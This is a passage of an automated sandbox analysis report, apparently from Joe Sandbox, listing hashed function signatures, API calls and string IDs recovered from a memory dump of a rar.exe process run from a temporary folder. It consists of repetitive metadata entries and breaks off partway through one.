                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: *
                                                                                                                                                                                                                              • API String ID: 3215553584-163128923
                                                                                                                                                                                                                              • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                              • Instruction ID: d4623b319e7581db6ab2f034d5355e836de3e5e48cacf79df4fe5fe642e1e660
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C715B7290865286E76C8F2D906557C3BA0FB49F08FB41336DB4AC22A8DF3DE981D745
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                              • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                              • Instruction ID: 4bd00e45abcf67713c6ed388030a84410cf6b5f84fc190662311dcf3261b7fce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A51E362B186D24AE7298B39D8413696A91FB49B94F4C8331C7AC87BE6CE2CD4448700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF6BBCD475B,?,00000000,?,?,00007FF6BBCD4620,?,00000000,?), ref: 00007FF6BBCE4633
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: UNC$\\?\
                                                                                                                                                                                                                              • API String ID: 1611563598-253988292
                                                                                                                                                                                                                              • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                              • Instruction ID: 0d4074e11ae2582e28d9e59eba0529175576960e77a27e65758cd0408d8f1404
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A041A211A2968281EA24EB59E40A1BD6375BF4DBC4F818531EF6DC76F6EF2CF645C200
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe
                                                                                                                                                                                                                              • API String ID: 3307058713-636270199
                                                                                                                                                                                                                              • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                              • Instruction ID: 0a7fbdb402f55cc080c7ce1fc9c32c5913951b85b86a75327aedf4a53e3554dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8541A136A08A6295EB1CDF29D4400B87795FB48B94B498235EB4E83BA5DF3DE441C704
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFilewcsstr
                                                                                                                                                                                                                              • String ID: System Volume Information\
                                                                                                                                                                                                                              • API String ID: 1592324571-4227249723
                                                                                                                                                                                                                              • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                              • Instruction ID: dd078fd637aa7123ec91acf19b1e49f8547c94780e15170fa8e2aa943a93410c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD31FE22A1A68185EB55DB29A1592BE6B70BF4DBC0F445171EF8D877B6CF3CE0498700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LoadString$fflushswprintf
                                                                                                                                                                                                                              • String ID: %d.%02d$[
                                                                                                                                                                                                                              • API String ID: 1946543793-195111373
                                                                                                                                                                                                                              • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                              • Instruction ID: 9b621eea2d46b225b548aa00833d60d182a9077c66403f78af8e286db4b3047b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1319A21A19AC251FA64EB18E0993BA63B0FF98784F444139E75D8B6E6DF3CE544C780
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: snprintf
                                                                                                                                                                                                                              • String ID: $%s$@%s
                                                                                                                                                                                                                              • API String ID: 4288800496-834177443
                                                                                                                                                                                                                              • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                              • Instruction ID: fbe0fb09ddfd6321c2c165ea937744a0ab3ac434dc1e3bcc0a65638ae7336eca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D31BF22B08A82A5EA14DB5DE4487E92770FB88784F401132EF4D97B79DF3DE509C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: fixed%u.$fixed.
                                                                                                                                                                                                                              • API String ID: 233258989-2525383582
                                                                                                                                                                                                                              • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                              • Instruction ID: 34a6b02415d1334cb26c491eec386144e161fbc00d33f608ed070e6709c26d40
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3431B722A1868192FB10DB29E4053ED6370FB58790F900232EB5D976FADF3CE146CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                                              • String ID: Done
                                                                                                                                                                                                                              • API String ID: 2948472770-499744565
                                                                                                                                                                                                                              • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                              • Instruction ID: a1690369636a684e0361727373512c506631f059deaeb3c1837ef56c7a5fc0be
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72112B65B18B8186EA189F1AE844169B7A1FF9CFC0B54853ACF0CD3334EE7CE6468244
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: ;%%0%du
                                                                                                                                                                                                                              • API String ID: 233258989-2249936285
                                                                                                                                                                                                                              • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                              • Instruction ID: 630c1e63ec4a75a0c67daeac27bfdfad8b78c889fb7e135e4e36049e772fc598
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC11B622B08A8546E724DB28E0143E97770FB8C744F894131EB4D877A6DF3CD949CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCE42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6BBCE430F
                                                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,00007FF6BBCD0BED,?,?,00000000,?,?,00007FF6BBCCF30F,00000000,00007FF6BBCB6380,?,00007FF6BBCB2EC8), ref: 00007FF6BBCD337E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InformationVolumeswprintf
                                                                                                                                                                                                                              • String ID: FAT$FAT32
                                                                                                                                                                                                                              • API String ID: 989755765-1174603449
                                                                                                                                                                                                                              • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                              • Instruction ID: 8a90e7db5e554a26184524f1dda8d24eb7616a82744356fe7cb7d2be3b24189a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48115121A5CA8281FB60DB18E8952EA63A5FF88344F845131EB4DC3AA5DF3CE115CB04
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
